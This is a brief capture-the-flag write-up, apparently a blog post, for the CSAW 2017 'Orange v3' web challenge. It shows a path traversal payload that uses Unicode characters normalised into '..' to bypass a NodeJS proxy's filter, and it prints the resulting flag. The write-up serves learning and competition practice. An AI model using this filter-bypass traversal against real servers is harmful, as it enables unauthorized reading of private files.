CSAW CTF Qualification Round 2017 -- Orange v3 -- Web300 Writeup

in #infosec7 years ago

CSAW CTF Qualification Round 2017 -- Orange v3 -- Web300 Writeup


problem description

orange v3
I wrote a little proxy program in NodeJS for my poems folder but I'm bad at programming so I had to rewrite it. Again. I changed up flag.txt too but everyone still wants to read it... http://web.chal.csaw.io:7312/?path=orange.txt 


looks like orange v1 was solved unintended way so now we can try harder solving it


quick look at it turns out some chars are banned {# and . and %} and our input must end with .txt


checking out internet found some reference in orange blackhat conf slides 

https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

http://web.chal.csaw.io:7312/?path=%E2%B8%AE%E2%B8%AE/flag.txt

flag{s0rry_this_t00k_s0_m@ny_tries...}